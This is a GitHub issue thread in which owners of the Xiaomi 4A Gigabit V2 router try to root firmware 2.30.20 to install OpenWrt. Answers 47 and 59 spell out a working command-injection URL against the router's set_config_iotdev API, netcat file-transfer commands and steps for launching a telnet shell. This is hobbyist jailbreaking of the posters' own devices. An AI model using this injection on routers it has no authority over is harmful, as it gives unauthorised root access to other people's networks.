Not working R4A (Xiaomi 4a Gigabit) 2.30.20

Question

Not working R4A (Xiaomi 4a Gigabit) 2.30.20

teammate100 opened this issue 2 years ago · 105 comments

Script appears to work, but ftp/ssh/telnet can not connect.
However it gets stok automatically.
This is Ubuntu 20.04.3 completely stock.
I also tried with option 2 to download needed files from remote github repository, no difference.

*Please note the Docker would not build correctly with either docker or sudo docker, so I git cloned OpenWRTInvasion and put my OpenWRT firmware in there.

$ python3 remote_command_execution_vulnerability.py
Router IP address [press enter for using the default 'miwifi.com']: 192.168.31.1
Enter router admin password: OpenWRTInvasion
There two options to provide the files needed for invasion:
   1. Use a local TCP file server runing on random port to provide files in local directory `script_tools`.
   2. Download needed files from remote github repository. (choose this option only if github is accessable inside router device.)
Which option do you prefer? (default: 1)1
****************
router_ip_address: 192.168.31.1
stok: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
file provider: local file server
****************
start uploading config file...
start exec command...
local file server is runing on 0.0.0.0:49557. root='script_tools'
done! Now you can connect to the router using several options: (user: root, password: root)
* telnet 192.168.31.1
* ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc -o UserKnownHostsFile=/dev/null root@192.168.31.1
* ftp: using a program like cyberduck

Then I try
telnet 192.168.31.1
But I get
telnet: connect to address 192.168.31.1: Connection refused
same with ssh and ftp.

I assume this person had success with this version 2.30.20, but their advice isn't clear.
#135 (comment)

mark4z commented 2 years ago

Me too

Answer 1 · 2022-09-01T11:21:08.000Z

Seems your machine cannot connect to the router. I cant help much, as this depends on your network setup. My suggestion would be that you try to simplify your setup as much as possible

Answer 2 · 2022-09-01T11:54:31.000Z

Seems your machine cannot connect to the router. I cant help much, as this depends on your network setup. My suggestion would be that you try to simplify your setup as much as possible

This is not the issue, because I have no problem connecting to the router with DHCP or manual IP (192.168.31.2). The network is also working perfectly with modem connected to WAN.
No WIFI used, this is direct ethernet cable between the PC and the router.

I also tried power cycling the router several times and doing the script immediately upon bootup, no difference.

I also tried in Windows 10 with Docker, no difference.

My 4a Gigabit is manufactured 07/2022. Is there something I can check for you on the router itself?

Answer 3 · 2022-09-01T13:30:33.000Z

Is there something I can check for you on the router itself?

Not really :( I do not have access to a router to test it out, I do not think I can help

Answer 4 · 2022-09-05T14:20:26.000Z

same situation, all works well until connecting to the router with telnet or ssh, any solution? thx

Answer 5 · 2022-09-07T15:32:15.000Z

same situation, i tried to invade in several versions of this tool, but none of them could allow me to connect through telnet.

i spent hours trying different version, other guys don't waste time on it, it won't work.

i think i would got refund on the router i bought, it disappointed me.

Answer 6 · 2022-09-08T21:33:56.000Z

Version 3.0.10 is reported to work: #145

Answer 7 · 2022-09-09T14:22:46.000Z

Added information to readme, thanks!

Answer 8 · 2022-09-15T17:39:47.000Z

Maybe the security issue has been fixed officially, I uncomment the result of upload code, and got the following error:
start uploading config file... {"code":1629,"msg":"解压失败，可能文件已经损坏"}

Means "Couldn't unzip, the file is corrupt"

Answer 9 · 2022-09-17T22:33:38.000Z

I've dumped the chip and will reverse engineer the differences and look for the reason and maybe a way to hack it again. The cgi-bin/upload file is the same, now I have to look which file will be executed for the c_upload api endpoint. The hack is pretty simple, as long we get a few files on the router

Answer 10 · 2022-09-18T09:42:14.000Z

any update

Answer 11 · 2022-09-18T20:08:52.000Z

I've dumped the chip and will reverse engineer the differences and look for the reason and maybe a way to hack it again. The cgi-bin/upload file is the same, now I have to look which file will be executed for the c_upload api endpoint. The hack is pretty simple, as long we get a few files on the router

I am afraid it's not about c_upload, maybe testing net speed will not evaluate the command in the url anymore, so it will be hard, or even impossible.

Anyway, it's my opinion, good luck.

Answer 12 · 2022-09-18T20:20:50.000Z

I will see what happens. If everything fails, we have to programm the chip the hardcore way and downgrade it to a vulnerable firmware or openwrt directly

Answer 13 · 2022-09-19T15:53:34.000Z

So, I looked up what the vulnerable script was. Its /usr/bin/upload_speedtest, or was. The upload saved a file in /tmp/ named speedtest_urls.xml with the script and /usr/bin/speedtest would execute the wget command and that, loaded the script. Sadly, the code changed:

2.28.69 and

`
local cfg = {
....
['xmlfile'] = "/usr/share/speedtest.xml",
['tmp_speedtest_xml'] = "/tmp/speedtest_urls.xml",
}

local filename = ""
filexml = io.open(cfg.tmp_speedtest_xml)
if filexml then
filexml:close()
filename = cfg.tmp_speedtest_xml
else
filename = cfg.xmlfile
end
filename = cfg.xmlfile
`

To the new 2.30.20:
`
local cfg = {
....
['xmlfile'] = "/usr/share/speedtest.xml",
['tmp_speedtest_xml'] = "/tmp/speedtest_urls.xml",
}

local filename = ""
--filexml = io.open(cfg.tmp_speedtest_xml)
--if filexml then
-- filexml:close()
-- filename = cfg.tmp_speedtest_xml
--else
-- filename = cfg.xmlfile
--end
filename = cfg.xmlfile
`

And that's the reason the attack is not working anymore. (For noncoders, they did not load the /tmp file, they use the internal file that is in the firmware, and we can't change that)

I upload the bindump of 2.30.20, and we could look for another bug, but atm, our best solution would be downgrading the router to a vulnerable version or directly install OpenWRT with a programmer.

Extracted dump with Binwalk (on Linux, you need root or sudo -s)
https://drive.proton.me/urls/CGCNWSMQB0#bkj9NIVPIR06

Direct Bin dump from the chip
https://drive.proton.me/urls/58Q1BHMN18#GKbX5gTA6XBS

I also tried to activate the serial console, but it refused the new parameters, here is the serial console output
https://drive.proton.me/urls/AF1Z9XA290#ct6pXZqm6ijn

Changed uboot code:
bootcmd=mtkautoboot bootdelay=9 stdin=serial stdout=serial stderr=serial flag_boot_rootfs=0 wl1_radio=1 model=R4AV2 mode=Router no_wifi_dev_times=0 boot_wait=on uart_en=0 telnet_en=1 CountryCode=CN color=101 ssh_en=0 nv_wan_type=static flag_boot_success=1 flag_try_sys1_failed=0 flag_try_sys2_failed=0 normal_firmware_md5=11b6c8523198ac50137219388168d79d flag_boot_type=2 flag_ota_reboot=0 flag_last_success=0 restore_defaults=0 Router_unconfigured=0
Telnet was activated, but does nothing, bootdelay to 9 seconds and bootwait to on. But nope, no serial console working.
Does somebody have an old bindump I could play with?

Answer 14 · 2022-09-19T20:16:37.000Z

Does somebody have an old bindump I could play with?

Thanks for your efforts, and I can't make it work for serial console, so the boot delay won't let you download file from tftp?

Answer 15 · 2022-09-19T20:25:28.000Z

Does somebody have an old bindump I could play with?

Thanks for your efforts, and I can't make it work for serial console, so the boot delay won't let you download file from tftp?

Sadly no. First:

`U-Boot 2018.09 (Feb 22 2022 - 03:57:56 +0000), Build: jenkins-common_router_openwrt_bash_ota_publish-73

CPU: MediaTek MT7621AT ver 1, eco 3
Clocks: CPU: 880MHz, DDR: 600MHz, Bus: 220MHz, XTAL: 40MHz
Model: MediaTek MT7621 reference board
DRAM: 128 MiB
pcie reset control...
gpio data reg:0xfffd601a
gpio data reg:0xfff5601e
gpio data reg:0xfffd601e
Loading Environment from SPI Flash... SF: Detected gd25q128b with page size 256 Bytes, erase size 64 KiB, total 16 MiB
*** Warning - bad CRC, using default environment

In: uartlite0@1e000c00
Out: uartlite0@1e000c00
Err: uartlite0@1e000c00
Net:
Warning: eth@1e100000 (eth0) using random MAC address - 82:73:78:2e:b6:69
eth0: eth@1e100000

restore_defaults:
boot_wait is off !
Booting System 1 @00xBFD80000
SF: Detected gd25q128b with page size 256 Bytes, erase size 64 KiB, total 16 MiB
bootargs: console=ttyS0,115200 uart_en=0 factory_mode=0 mem=128m `

You see the "Warning - bad crc", this happens when I modify the bin dump and flash it onto the router and it boots.

I've tried to downgrade the firmware to various versions, everytime, the router downloads the img from my PC and then says "nope, magic hex number wrong" and stops there.

I did not try a squash or root fs of OpenWRT though, but I guess it's the same issue.

ATM, I'm searching for some bugs. I found something about the config backup, it's encrypted with AES, but the key in /squash-fs/etc/config/cfgbackup is just a hint, I need the cipher and if a key is somewhere or a salt. The LUA files may have it, but I didn't find anything there yet. My hope is, I can inject code via the upload of a config.

But this will take some time. I'm unhappy myself, it's the second router in 2 weeks I can't get running with OpenWRT :(

Answer 16 · 2022-09-22T09:01:09.000Z

But this will take some time. I'm unhappy myself, it's the second router in 2 weeks I can't get running with OpenWRT :(

I almost come here every day to see if there is any update. Waiting for your progress, my friend 👍

Answer 17 · 2022-09-27T18:47:36.000Z

To anyone who is interested, here is my last thought about this, and maybe it's wrong, just for advise:

The problem is not only about hacking into the system, but the 5g chip has changed(now mt7613ben), so the Openwrt firmware is not suitable anymore. We not only need the new hacking way, but also new firmware.

Answer 18 · 2022-09-27T18:55:06.000Z

That would suck tbh. If the chip is not supported by the Linux Kernel. We could ask in the OpenWrt Forum for it, but so far, I found no way around it. But I have more projects running, I can't put that much time into this.

Making a 21.x image with the Kernel Driver would be something, V3 need. But that's maybe the reason why downgrading the firmware did not work.

Answer 19 · 2022-09-28T04:40:03.000Z

where I can download the 2.30.20 factory firmware?
My 4AG is 2.28.69 chinese version, works no problems.

Answer 20 · 2022-09-28T06:04:11.000Z

So far, I didn't find a binary of it anywhere. I dumped my chip and that's it. But with the hardware changes, I guess you can't flash it back onto your chip.

Answer 21 · 2022-09-28T06:43:38.000Z

Then 2.30.20 cannot downgrade to the 2.28.69?

Answer 22 · 2022-09-28T09:08:01.000Z

I guess no, because I couldn't do it with any method I found. I tried the tftp debricking version too. The box loads the image, but then stops and says "the magic number is wrong".
That's why I search for firmware errors to get somehow access.

Changing the binary image is not working btw, I tried and it recovered the default config. The bootloader is the problem here.

Answer 23 · 2022-09-28T10:02:07.000Z

then, could we re-flash the bootloader from serial connection?
I can dump my 4AG bootloader bin code from openwrt (mtd0) for you.

Answer 24 · 2022-09-28T10:56:02.000Z

I don't know, I have a chip programmer to do it, you can also test my dump on your chip, but you can also put a chip dump somewhere for me, I'll try it.

Answer 25 · 2022-09-28T11:25:52.000Z

I just flash my 4AG from openwrt back to factory image via TFTP server, failed on v3.0.24 (File too large! / Header check error! /
Image verify failed! / ========Upgrade fail!======== ).

but success on v2.28.69, then use OpenWRTInvasion OK!

Answer 26 · 2022-09-28T12:12:07.000Z

@LordPinhead , here is my 4AG bootloader bin code downloaded from openwrt Luci GUI (mtd0), pls note maybe brick your device permanently, on your own risks.
OpenWrt.mtd0.zip

My 4AG flash IC is GD25Q128C.

Answer 27 · 2022-09-28T13:15:33.000Z

@acecilia , Hi, when I flash openwrt from factory v2.28.69, I got:

using ubuntu PC v20.04 and latest version OpenWRTInvasion

connect Lan cable to Eth1, no Wan connection, PC wifi off.
power on the router and waiting.
browser access 192.168.31.1 for the router initial page.
setup the wifi / admin password for the router, and No need to connect internet.
into the router admin page, I can see a stok no, but no need to copy it, even I can close the browser.
open a Terminal window in OpenWRTInvasion folder.
run python3 remote_command_execution_vulnerability.py.
I'm asked the router Admin password, enter it.
press Enter several times(select by defaults).
the software log out a stok no automatically.
then I could Telnet login the rooter on 192.168.31.1, if not success, try again from [6] above.
use Filezilla FTP to put openwrt sysupgrade.bin to the /tmp folder.
then, finally, run mtd -e OS1 -r write /tmp/sysupgrade.bin OS1 in the Terminal, ............ done!

My question is, in above steps and prograss:

no internet connection, only ubuntu connect to the router.
no need manually copy&paste any stok no to the PY software, software got it automatically.

Is it normal or new PY software improved?
I remember the internet connect and stok no copy from browser, are Must required.
Thanks.

Answer 28 · 2022-09-28T13:27:32.000Z

Is it normal or new PY software improved? I remember the internet connect and stok no copy from browser, are Must required. Thanks.

To your question, It is normal.

May I ask, after you installed openwrt firmware, Do the following things work properly?

WAN/LAN
LED Light
5G wireless

and whe you received the router, was the firmware version 2.30?

Answer 29 · 2022-09-28T14:08:56.000Z

@tangmingxing1988 hi, after my 4AG connected internet by WAN cable, my Ubuntu PC:

LAN to Eth1, internet speed 800 ~ 900Mbps
WiFi 2G connection, internet speed 15 ~ 20Mbps
WiFi 5G connection, internet speed 150 ~ 200Mbps
forgot the original version, maybe 2.28.62 or earlier
LEDs, 2 in blue color when Lan connected, with flashing

tested the internet speed on https://speedtest.ofca.gov.hk/speedtest.html

my openwrt firmware is v22.03.0, near official build.

Answer 30 · 2022-09-29T10:16:47.000Z

@LordPinhead , here is my 4AG bootloader bin code downloaded from openwrt Luci GUI (mtd0), pls note maybe brick your device permanently, on your own risks. OpenWrt.mtd0.zip

My 4AG flash IC is GD25Q128C.

Awesome, I will try it tomorrow when I'm home.

The chip should be the same, so this would be a way to downgrade for people until we find a vulnerability

Answer 31 · 2022-10-02T16:58:57.000Z

@acecilia @LordPinhead @tangmingxing1988 @teammate100 , all , this version is new 4AG!!!!!!, we could call it Xiaomi 4A Gigabit V2.
I received a reference model no generated from the software: R4AV2.

The critical issues is the V2 hardware changed somewhere, so we need a deep study and special development.

I burnt @LordPinhead dump code on my 4AG (v1), I can login the admin page, but:

LED not right
WAN not work
ETH1 not work
ETH2 OK
WiFi seems OK

The factory firmware, both bootloader and v2.30.20, should be from new tools, not same as the old one.

Answer 32 · 2022-10-03T16:21:43.000Z

@RadioOperator Agree, there is a long way to cover.

Answer 33 · 2022-10-03T17:34:09.000Z

I have maybe a few hours time on Wednesday and I flash the old firmware onto the V2.

If the Hardware has changed, we have to look which driver we have to include in the image.

The driver of the chip is in the newest image of a Xiaomi Openwrt router, I looked it up. So we maybe have to compile a new Kernel.

Answer 34 · 2022-10-03T17:57:03.000Z

@LordPinhead hi, suggest you roughly comparing the PCB and layout first, maybe CPU / ICs part number changed to new versions.

Answer 35 · 2022-10-04T12:47:11.000Z

Hi, the new V2 owners, please confirm the label shows device m/n is R4A printed on the back.

Please check here:
https://forum.openwrt.org/t/support-for-xiaomi-router-ac1200-rb02/124962/4

The V2 hardware, maybe same as Xiaomi AC1200 (RB02).

And the SSH info for RB02 / R4AV2:
https://4pda.to/forum/index.php?showtopic=988197&st=9960#entry117646422

Here is the openwrt forum related topic:
https://forum.openwrt.org/t/new-xiaomi-4a-gigabit-v2-on-the-market-openwrt-not-support-yet/138592

Answer 36 · 2022-10-08T13:10:36.000Z

@tangmingxing1988 @RadioOperator @LordPinhead Hi, I compiled a new openwrt firmware for R4AV2 and everything works fine except the leds, but it needs a programmer to flash it.

Answer 37 · 2022-10-08T13:19:24.000Z

@tangmingxing1988 @RadioOperator @LordPinhead Hi, I compiled a new openwrt firmware for R4AV2 and everything works fine except the leds, but it needs a programmer to flash it.

so, how to get shell for this one?

Answer 38 · 2022-10-08T13:23:33.000Z

so, how to get shell for this one?

Idk😢 It's hard to get shell for me

Answer 39 · 2022-10-08T13:25:48.000Z

good news, what diffs on the hw/sw?

Answer 40 · 2022-10-08T13:29:50.000Z

good news, what diffs on the hw/sw?

It seems the V2 has the same hardware with RB02

Answer 41 · 2022-10-18T13:51:36.000Z

so, how to get shell for this one?

Idkcry It's hard to get shell for me

Thx for the new Firmware. I had that on my list too, but stress at work prevented me from putting more time into this problem.

I compared the Hardware when the chip was pointed out, but somehow, my answer was not submitted. Yes, it's basically the same as the AC1200/RB02, maybe some traces are different. I have no 1200 to compare it too, it's still in delivery.

A shell-acces, that's what I also was searching for some time.
I would love to get a V1 with a vulnerable version and look at how the system on the router works. Or how the Ac1200 works, they have basically the same firmware.
So far, I put some time into it, not really getting a result, but I did not give up at this point.

Just flashing the firmware would be boring at this stage, I want shell :D

Answer 42 · 2022-10-24T19:25:03.000Z

good news, what diffs on the hw/sw?

It seems the V2 has the same hardware with RB02

hi, did you get the 5G signal, seems like RB02 works with mt7663 not mt7613

Answer 43 · 2022-10-26T12:00:25.000Z

@ZHDI-1 yep, i can get 5G signal with kmod-mt7663 compiled, and idk why it shows MT7613BE. You can try to compile for RB02 with this commit: wbs306/lede@146597f

Answer 44 · 2022-10-27T20:19:53.000Z

@ZHDI-1 yep, i can get 5G signal with kmod-mt7663 compiled, and idk why it shows MT7613BE. You can try to compile for RB02 with this commit: wbs306/lede@146597f

I find a commit openwrt shows 76x3 series use same divers, so R4AV2 named 7613 but use 7663 firmware, thanks for your dts commit, I will try it.

Answer 45 · 2022-10-27T20:19:59.000Z

@ZHDI-1 yep, i can get 5G signal with kmod-mt7663 compiled, and idk why it shows MT7613BE. You can try to compile for RB02 with this commit: wbs306/lede@146597f

I find a commit openwrt shows 76x3 series use same divers, so R4AV2 named 7613 but use 7663 firmware, thanks for your dts commit, I will try it.

Answer 46 · 2022-10-27T20:24:01.000Z

So, I looked up what the vulnerable script was. Its /usr/bin/upload_speedtest, or was. The upload saved a file in /tmp/ named speedtest_urls.xml with the script and /usr/bin/speedtest would execute the wget command and that, loaded the script. Sadly, the code changed:

2.28.69 and

`

local cfg = {

....

['xmlfile'] = "/usr/share/speedtest.xml",
    ['tmp_speedtest_xml'] = "/tmp/speedtest_urls.xml",
}

local filename = ""

filexml = io.open(cfg.tmp_speedtest_xml)

if filexml then
filexml:close()

filename = cfg.tmp_speedtest_xml
else
filename = cfg.xmlfile
end

filename = cfg.xmlfile

`

To the new 2.30.20:

`

local cfg = {

....

['xmlfile'] = "/usr/share/speedtest.xml",
    ['tmp_speedtest_xml'] = "/tmp/speedtest_urls.xml",
}

local filename = ""

--filexml = io.open(cfg.tmp_speedtest_xml)

--if filexml then

-- filexml:close()

-- filename = cfg.tmp_speedtest_xml

--else

-- filename = cfg.xmlfile

--end

filename = cfg.xmlfile

`

And that's the reason the attack is not working anymore. (For noncoders, they did not load the /tmp file, they use the internal file that is in the firmware, and we can't change that)

I upload the bindump of 2.30.20, and we could look for another bug, but atm, our best solution would be downgrading the router to a vulnerable version or directly install OpenWRT with a programmer.

Extracted dump with Binwalk (on Linux, you need root or sudo -s)

https://drive.proton.me/urls/CGCNWSMQB0#bkj9NIVPIR06

Direct Bin dump from the chip

https://drive.proton.me/urls/58Q1BHMN18#GKbX5gTA6XBS

I also tried to activate the serial console, but it refused the new parameters, here is the serial console output

https://drive.proton.me/urls/AF1Z9XA290#ct6pXZqm6ijn

Changed uboot code:

`

bootcmd=mtkautoboot

bootdelay=9

stdin=serial

stdout=serial

stderr=serial

flag_boot_rootfs=0

wl1_radio=1

model=R4AV2

mode=Router

no_wifi_dev_times=0

boot_wait=on

uart_en=0

telnet_en=1

CountryCode=CN

color=101

ssh_en=0

nv_wan_type=static

flag_boot_success=1

flag_try_sys1_failed=0

flag_try_sys2_failed=0

normal_firmware_md5=11b6c8523198ac50137219388168d79d

flag_boot_type=2

flag_ota_reboot=0

flag_last_success=0

restore_defaults=0

Router_unconfigured=0

`

Telnet was activated, but does nothing, bootdelay to 9 seconds and bootwait to on. But nope, no serial console working.

Does somebody have an old bindump I could play with?

About the last issue, you missed crc32 check at the before of uboot settings binary code, you can write a sample script to check how many blocks this crc value check

Answer 47 · 2022-10-30T00:18:57.000Z

I managed to get shell access on this device without a chip programmer

The instructions are valid for macOS and GNU/Linux. I don't know how to pipe stuff from or to netcat on Windows.

Introduction

I am on R4AV2 firmware MiWiFi 稳定版 2.30.20

This firmware has the speedtest exploit patched, but it still has the set_config_iotdev remote exec exploit:

In short, if you make a get request (open the link in the browser) to http://{{{ROUTER_IP}}}/cgi-bin/luci/;stok={{{STOK}}}/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0A{{{URL_ENCODED_COMMAND}}}%0A , the command in {{{URL_ENCODED_COMMAND}}} gets executed.

By default, {{{ROUTER_IP}}} is 192.168.31.1 (default gateway in network settings of your PC connected to the router). {{{STOK}}} can be found in the URL by logging into the admin console of the router (http://192.168.31.1/cgi-bin/luci/;stok=STOK_WILL_BE_HERE/web/home#router). And, well, {{{URL_ENCODED_COMMAND}}} is the shell command that you want to execute in urlencoded format (https://www.urlencoder.io/)

You can verify the exploit by executing the reboot command: http://192.168.31.1/cgi-bin/luci/;stok={{{STOK}}}/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0Areboot%0A - the router will reboot.

Unfortunately for us, Xiaomi removed dropbear (ssh) binaries in this firmware. And I couldn't make built-in telnet work.

NetCat saves the day

But! nc (netcat/ncat) works like a charm! Abusing that, we can transfer any files to or from the router (and thus we can upload working telnet/ssh/ftp/whatever binaries). ncat can be downloaded here https://nmap.org/download

To download a file from the router:
On your computer: run ncat -l 1234 > downloaded_file_name.txt
On your router: run nc {{{YOUR_PC_IP_ADDR}}} 1234 < /path/to/file_on_router' (via the exploit mentioned above)
You can test that by downloading /etc/hosts from the router.

You should replace {{{YOUR_PC_IP_ADDR}}} with a local IP of your computer (192.168.31.X)

To upload a file to the router:
On your computer: run ncat -l 1234 < file_to_upload_from_your_pc.txt
On your router: run nc {{{YOUR_PC_IP_ADDR}}} 1234 > /path/to/saved_file' (via the exploit mentioned above)
You can test it by uploading a small file from your PC to /tmp/file.txt, and then download it back via the method described above.

But! Here's a catch. From my testing, the router can only receive files up to 8Kb via nc. Our telnet/ssh binaries will surely be bigger than that. So, we need to split our binaries.

Splitting files

As I don't like splitting raw binaries, I decided to convert my binary to base64 first. You can do it here, by example: https://base64.guru/converter/encode/file

To split the resulting base64 file into pieces, run split -b 6K base64.txt on your computer (I decided to split into 6Kb pieces to be extra safe, more testing required)

The result of this command will be a folder full of files named xaa, xab, xac... I uploaded all of them to a separate folder on the router (/tmp/split), using the ncat method described above.

Then, I had to combine them back into a single file. To do that, run cat /tmp/split/x* > /tmp/split/final.txt on your router.

To decode a base64 encoded file into a binary, run base64 -d /tmp/split/final.txt > /tmp/split/final on your router.

To be extra sure that the file was not damaged, I decided to validate the md5 sum of the file by running md5sum /tmp/split/final on the router.

Then, make the file executable by running chmod +x /tmp/split/final on your router.

And finally, the file is ready to be executed.

Shell access

In my case, I uploaded a precompiled busybox binary with telnet supported.

I ran it /tmp/split/final telnetd on my router, and the telnet server was successfully launched.

Then, I connected to it by running telnet 192.168.31.1 on my PC.

Afterthoughts

To simplify the process of uploading multiple files to the router, I made a small Python script for batch uploads:
upl_file.py.zip

To use it, first, edit the script to configure your PC's IP addr and router's STOK. Then, make a /tmp/split folder by executing mkdir /tmp/split/ on the router. Create a new folder on your PC called split in the same folder where your script is, and put all xaa, xab, xac... files there. Install requests module for python3 if not already installed by running pip3 install requests --user on your PC. And finally, run the script by executing python3 upl_file.py on your PC

I also realized that I can explore the file system of the router by piping stdout/stderr of commands on the router to a file in /tmp, and then downloading the file to my PC via ncat. I also made a script for that, but as I figured out how to get telnet access, this doesn't seem relevant, so I will not be posting that.

Known working busybox binary: busybox.zip

For the lazy ones, here's an already split busybox binary: split_busybox.zip

Answer 48 · 2022-10-30T00:21:22.000Z

personal ping to @LordPinhead , @RadioOperator , @MosesCN , @Maxlinn

Answer 49 · 2022-10-30T04:19:07.000Z

Now that is surprising. I knew of the old exploit, but did not test it. I thought there is a reason the speedtest one would be used.

But that's great news. I guess the netcat transfer limit could be avoided with a simple bash script that gets executed? Download the binary from a server, and that's it. Its 5am here, I get a few hours of sleep and will install the old firmware again to test it out!

Answer 50 · 2022-10-30T14:47:28.000Z

@LordPinhead I did not want to connect the router to the internet, which is why I haven't tried downloading from the internet. Haven't tested that, but theoretically should work

Answer 51 · 2022-10-30T14:48:50.000Z

@wbs306 do you mind sharing the config that you used to build LEDE from your fork? or maybe even precompiled binaries known to work

Answer 52 · 2022-10-30T16:21:40.000Z

@LordPinhead I did not want to connect the router to the internet, which is why I haven't tried downloading from the internet. Haven't tested that, but theoretically should work

How about starting a temporary local webserver in python? I'm trying the exploit now and code a bit and let you know.

Answer 53 · 2022-10-30T22:24:44.000Z

@vanyasem @acecilia I made a pull request. A vanilla router was successfully rooted by this multiple times. No need for internet access. You only need the router ip to the interface, the ip of the box you are using, webinterface password, the rest is working like normal.

The script is basically packing what we need for root access, starts a local web server, the files are loaded to the router and the scripts executed.

Answer 54 · 2022-10-31T01:14:21.000Z

@wbs306 do you mind sharing the config that you used to build LEDE from your fork? or maybe even precompiled binaries known to work

There's no different with R4AG, so you can try this config file to build. https://github.com/wbs306/Action_OpenWrt_Xiaomi_R4AG/blob/main/r4a.config

Answer 55 · 2022-11-02T10:45:48.000Z

anyone tried this using wsl (ubuntu) ?
I've been trying to get nc (from the router) to send a file like the /etc/hosts file to my pc but i have a feeling the wsl bridge network is interfering.
also when running the script in wsl it seems like the nc port (port 1234) doesn't close and i get "port already open" errors for each file in the loop, see pic attached - I'm assuming the port closes after the transfer is complete, which leads me to think wsl bridge network is doing something here.
windows firewall is turned off

Answer 56 · 2022-11-02T17:38:22.000Z

@cuanblane first of all, there's a new improved version of the script in a pull request. My message was technical, not intended for users

Second of all, address already in use means that a previous instance on ncat is already running, which indicated that your router couldn't find your computer and connect to it. Most likely you messed up STOK or IP configurations. Anyways, please, don't use this script, a much better way was found here #155

Answer 57 · 2022-11-02T22:33:38.000Z

Thanks @vanyasem
Yea something is probably not set right - although the reboot test worked using the remote exec exploit.
Thanks for replying mate, I appreciate it, I'll try out the v2 script

Answer 58 · 2022-11-03T10:44:27.000Z

@cuanblane the reboot test is meant to indicate that your PC can connect to the router, not vice versa. I don't know how WSL works, but AFAIK WSL v2 uses a VM and has NAT for it's networking, hence your router cannot detect it, because the IP is incorrect

v2 should work natively on Windows, only requiring Python to be installed on the machine

Answer 59 · 2022-11-03T16:31:30.000Z

I managed to get shell access on this device without a chip programmer

The instructions are valid for macOS and GNU/Linux. I don't know how to pipe stuff from or to netcat on Windows.

Introduction

I am on R4AV2 firmware MiWiFi 稳定版 2.30.20

This firmware has the speedtest exploit patched, but it still has the set_config_iotdev remote exec exploit:

In short, if you make a get request (open the link in the browser) to http://{{{ROUTER_IP}}}/cgi-bin/luci/;stok={{{STOK}}}/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0A{{{URL_ENCODED_COMMAND}}}%0A , the command in {{{URL_ENCODED_COMMAND}}} gets executed.

By default, {{{ROUTER_IP}}} is 192.168.31.1 (default gateway in network settings of your PC connected to the router). {{{STOK}}} can be found in the URL by logging into the admin console of the router (http://192.168.31.1/cgi-bin/luci/;stok=STOK_WILL_BE_HERE/web/home#router). And, well, {{{URL_ENCODED_COMMAND}}} is the shell command that you want to execute in urlencoded format (https://www.urlencoder.io/)

You can verify the exploit by executing the reboot command: http://192.168.31.1/cgi-bin/luci/;stok={{{STOK}}}/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0Areboot%0A - the router will reboot.

Unfortunately for us, Xiaomi removed dropbear (ssh) binaries in this firmware. And I couldn't make built-in telnet work.

NetCat saves the day

But! nc (netcat/ncat) works like a charm! Abusing that, we can transfer any files to or from the router (and thus we can upload working telnet/ssh/ftp/whatever binaries). ncat can be downloaded here https://nmap.org/download

To download a file from the router:

On your computer: run ncat -l 1234 > downloaded_file_name.txt

On your router: run nc {{{YOUR_PC_IP_ADDR}}} 1234 < /path/to/file_on_router' (via the exploit mentioned above)

You can test that by downloading /etc/hosts from the router.

You should replace {{{YOUR_PC_IP_ADDR}}} with a local IP of your computer (192.168.31.X)

To upload a file to the router:

On your computer: run ncat -l 1234 < file_to_upload_from_your_pc.txt

On your router: run nc {{{YOUR_PC_IP_ADDR}}} 1234 > /path/to/saved_file' (via the exploit mentioned above)

You can test it by uploading a small file from your PC to /tmp/file.txt, and then download it back via the method described above.

But! Here's a catch. From my testing, the router can only receive files up to 8Kb via nc. Our telnet/ssh binaries will surely be bigger than that. So, we need to split our binaries.

Splitting files

As I don't like splitting raw binaries, I decided to convert my binary to base64 first. You can do it here, by example: https://base64.guru/converter/encode/file

To split the resulting base64 file into pieces, run split -b 6K base64.txt on your computer (I decided to split into 6Kb pieces to be extra safe, more testing required)

The result of this command will be a folder full of files named xaa, xab, xac... I uploaded all of them to a separate folder on the router (/tmp/split), using the ncat method described above.

Then, I had to combine them back into a single file. To do that, run cat /tmp/split/x* > /tmp/split/final.txt on your router.

To decode a base64 encoded file into a binary, run base64 -d /tmp/split/final.txt > /tmp/split/final on your router.

To be extra sure that the file was not damaged, I decided to validate the md5 sum of the file by running md5sum /tmp/split/final on the router.

Then, make the file executable by running chmod +x /tmp/split/final on your router.

And finally, the file is ready to be executed.

Shell access

In my case, I uploaded a precompiled busybox binary with telnet supported.

I ran it /tmp/split/final telnetd on my router, and the telnet server was successfully launched.

Then, I connected to it by running telnet 192.168.31.1 on my PC.

Afterthoughts

To simplify the process of uploading multiple files to the router, I made a small Python script for batch uploads:

upl_file.py.zip

To use it, first, edit the script to configure your PC's IP addr and router's STOK. Then, make a /tmp/split folder by executing mkdir /tmp/split/ on the router. Create a new folder on your PC called split in the same folder where your script is, and put all xaa, xab, xac... files there. Install requests module for python3 if not already installed by running pip3 install requests --user on your PC. And finally, run the script by executing python3 upl_file.py on your PC

I also realized that I can explore the file system of the router by piping stdout/stderr of commands on the router to a file in /tmp, and then downloading the file to my PC via ncat. I also made a script for that, but as I figured out how to get telnet access, this doesn't seem relevant, so I will not be posting that.

Known working busybox binary: busybox.zip

For the lazy ones, here's an already split busybox binary: split_busybox.zip

Good job! I almost give up for this router.
Nice Russia guy!

Answer 60 · 2022-11-03T16:33:41.000Z

Thanks @vanyasem

Yea something is probably not set right - although the reboot test worked using the remote exec exploit.

Thanks for replying mate, I appreciate it, I'll try out the v2 script

Just reboot and try again

Answer 61 · 2022-11-03T16:37:03.000Z

Now we need a firmware for r4ag v2🤓

Answer 62 · 2022-11-04T07:22:47.000Z

@ZHDI-1 yep, i can get 5G signal with kmod-mt7663 compiled, and idk why it shows MT7613BE. You can try to compile for RB02 with this commit: wbs306/lede@146597f

@wbs306
I saw you made 2 commits: First for R4AV2 and 2nd for Breed Bootloader. Looks like that you intended to use Breed, Do you know which BREED bin can be used for R4AV2?
https://breed.hackpascal.net

Note: I learnt from your Action page referring to a link said: R4A v1 = R3G v2, 小米R4A千兆版与小米R3G V2是一样的货 https://www.right.com.cn/FORUM/thread-4052254-1-1.html

Would you please clarify if Breed for R4AV2 would works?

Thank you!

Answer 63 · 2022-11-05T03:39:48.000Z

